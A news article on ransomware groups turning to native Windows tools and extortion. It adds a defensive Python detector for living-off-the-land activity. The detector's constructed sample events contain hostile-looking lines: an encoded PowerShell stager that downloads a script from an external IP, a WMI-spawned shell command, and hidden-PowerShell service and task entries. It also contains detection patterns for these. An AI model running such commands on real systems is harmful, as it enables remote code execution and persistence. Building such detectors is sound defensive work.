Ransomware operators are changing tactics as fewer victims pay. New reporting shows attackers are moving away from easily flagged post-exploitation tools such as Cobalt Strike and leaning more on native Windows utilities, while data theft and extortion continue to rise.
According to Dark Reading, the shift reflects a tougher business environment for ransomware groups: payment rates have fallen to record lows, and defenders have become better at spotting common offensive frameworks. In response, attackers are increasingly using built-in Windows features and “living off the land” techniques, including PowerShell, Windows Management Instrumentation, scheduled tasks, and remote administration methods that can blend into normal IT activity.
That tradecraft change matters because it reduces obvious malware signals after initial access. Instead of dropping noisy tools that endpoint products often detect quickly, intruders can abuse legitimate system binaries and admin workflows to move laterally, run commands, and stage data for exfiltration. The result is a harder investigation path for defenders, especially in Windows-heavy enterprise environments where those tools are used every day.
The economic pressure behind the shift is well documented. Coveware has repeatedly reported lower ransomware payment rates and shrinking median payments in recent quarters, while incident responders and government agencies have warned that many groups now prioritize stealing data and threatening leaks over relying on encryption alone. That means organizations may face extortion demands even when systems are restored from backups or encryption is limited.
For defenders, the trend reinforces a familiar lesson: blocking one tool does not stop the intrusion. Because living-off-the-land activity drops no malware to scan for, detection has to come from the telemetry those utilities leave behind: process-creation and PowerShell script-block logging, service-installation and scheduled-task creation events, and network flow data. Security teams need alerting on suspicious use of PowerShell, WMI, scheduled tasks, remote service creation, and unusually large outbound data transfers, tuned against what their own administrators do every day. Hardening exposed remote access, especially corporate VPN gateways and RDP services, remains important because many attacks still begin with stolen credentials or exploited edge devices before shifting to native tools inside the network.
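The monitoring described above, as an added example (not code from the Dark Reading report or any vendor): a small Python detector that runs a few living-off-the-land rules over constructed Windows event records shaped like Security 4688 (process creation), System 7045 (service installed) and Security 4698 (scheduled task created), plus a generic flow record for outbound volume. All sample events, hosts and addresses are constructed, and the 500 MiB outbound threshold is an assumption to be tuned per environment.

```python
"""Toy detector for living-off-the-land activity in Windows event records.
Added example, not from the Dark Reading report. Records mimic Security 4688
(process creation), System 7045 (service installed), Security 4698 (scheduled
task created) and a generic flow record; all sample data is constructed and
OUTBOUND_LIMIT is an assumed threshold, not a published figure."""
import base64
import ipaddress
import re
from collections import defaultdict

SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
USER_WRITABLE = re.compile(r"\\(users|temp|programdata|appdata)\\", re.I)
ENCODED_FLAG = re.compile(r"(?:^|\s)-(?:encodedcommand|enc|en|ec|e)\s+([A-Za-z0-9+/=]{16,})", re.I)
INTERNAL = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]
OUTBOUND_LIMIT = 500 << 20  # assumed: bytes per (host, destination) per window

def first_exe(cmdline):
    """Lower-cased basename of a Windows command line's first token, quoted or not."""
    m = re.match(r'\s*(?:"([^"]+)"|(\S+))', cmdline)
    token = (m.group(1) or m.group(2)) if m else ""
    return token.rsplit("\\", 1)[-1].lower()

def decode_encoded_command(cmdline):
    """Decode a PowerShell -EncodedCommand payload (base64 of UTF-16LE), else None."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None

def shell_or_writable(cmdline):
    """True if the command runs a scripting host or a binary under a user-writable path."""
    return first_exe(cmdline) in SHELLS or USER_WRITABLE.search(cmdline) is not None

def check_process(ev):
    """4688: encoded PowerShell, or a shell whose parent is WmiPrvSE (remote WMI execution)."""
    hits, image = [], first_exe(ev["NewProcessName"])
    decoded = decode_encoded_command(ev.get("CommandLine", ""))
    if image in {"powershell.exe", "pwsh.exe"} and decoded is not None:
        hits.append(("encoded_powershell", ev["host"], decoded))
    if first_exe(ev.get("ParentProcessName", "")) == "wmiprvse.exe" and image in SHELLS:
        hits.append(("wmi_remote_exec", ev["host"], ev.get("CommandLine", "")))
    return hits

def check_service(ev):
    """7045: new service whose ImagePath is a shell or a user-writable location."""
    path = ev["ImagePath"]
    return [("suspicious_service", ev["host"], f"{ev['ServiceName']}: {path}")] if shell_or_writable(path) else []

def check_task(ev):
    """4698: scheduled task whose action is a shell or a user-writable location."""
    action = f"{ev['Command']} {ev.get('Arguments', '')}".strip()
    return [("suspicious_task", ev["host"], f"{ev['TaskName']}: {action}")] if shell_or_writable(action) else []

def check_flows(flows):
    """Sum bytes sent per (host, destination); flag large totals to non-RFC1918 addresses."""
    totals = defaultdict(int)
    for f in flows:
        if not any(ipaddress.ip_address(f["dst"]) in net for net in INTERNAL):
            totals[(f["host"], f["dst"])] += f["bytes_out"]
    return [("large_outbound", host, f"{dst} {total >> 20} MiB")
            for (host, dst), total in totals.items() if total >= OUTBOUND_LIMIT]

HANDLERS = {4688: check_process, 7045: check_service, 4698: check_task}

def scan(events, flows):
    """Apply the per-event handlers, then the flow aggregation; return (kind, host, detail) tuples."""
    alerts = []
    for ev in events:
        alerts.extend(HANDLERS.get(ev["event_id"], lambda _: [])(ev))
    return alerts + check_flows(flows)

# Constructed sample data; the encoded payload is built here so it round-trips exactly.
STAGER = "Invoke-WebRequest http://203.0.113.10/s.ps1 -OutFile C:\\Users\\Public\\s.ps1"
ENCODED = base64.b64encode(STAGER.encode("utf-16le")).decode()
SAMPLE_EVENTS = [
    {"event_id": 4688, "host": "WS01", "ParentProcessName": "C:\\Windows\\explorer.exe",
     "NewProcessName": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "CommandLine": f"powershell.exe -nop -w hidden -enc {ENCODED}"},
    {"event_id": 4688, "host": "WS01", "ParentProcessName": "C:\\Windows\\System32\\services.exe",
     "NewProcessName": "C:\\Windows\\System32\\svchost.exe", "CommandLine": "svchost.exe -k netsvcs"},
    {"event_id": 4688, "host": "WS03", "ParentProcessName": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe",
     "NewProcessName": "C:\\Windows\\System32\\cmd.exe", "CommandLine": "cmd.exe /c whoami > C:\\Windows\\Temp\\o.txt"},
    {"event_id": 7045, "host": "SRV01", "ServiceName": "Updater",
     "ImagePath": "\"C:\\Windows\\System32\\cmd.exe\" /c powershell -nop -File C:\\ProgramData\\u.ps1"},
    {"event_id": 4698, "host": "WS02", "TaskName": "\\Microsoft\\Windows\\Sync",
     "Command": "powershell.exe", "Arguments": "-w hidden -File C:\\ProgramData\\sync.ps1"},
    {"event_id": 4698, "host": "WS02", "TaskName": "\\Vendor\\Check",
     "Command": "\"C:\\Program Files\\Vendor\\agent.exe\"", "Arguments": "--check"},
]
SAMPLE_FLOWS = [  # WS01 sends 700 MiB to one external host; its internal backup traffic is ignored
    {"host": "WS01", "dst": "203.0.113.77", "bytes_out": 400 << 20},
    {"host": "WS01", "dst": "203.0.113.77", "bytes_out": 300 << 20},
    {"host": "WS01", "dst": "10.0.0.9", "bytes_out": 900 << 20},
]

if __name__ == "__main__":
    for kind, host, detail in scan(SAMPLE_EVENTS, SAMPLE_FLOWS):
        print(f"{kind:20} {host:6} {detail}")
```

Running the script prints five alerts: the decoded stager from the encoded PowerShell launch, the shell spawned under WmiPrvSE, the service and task that point at a shell or a ProgramData script, and the 700 MiB aggregate to the external address, while the svchost launch, the vendor task and the internal transfer stay quiet. The point of aggregating flows rather than alerting per connection, and of decoding the encoded command rather than just flagging the `-enc` switch, is that both give an analyst something to act on; in production the same rules would need allow-lists for the management tools that legitimately do exactly this.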
The ransomware market is not disappearing. It is adapting. As profits tighten, attackers appear to be trading flashy tooling for quieter methods that are cheaper, harder to detect, and better suited to extortion-first operations.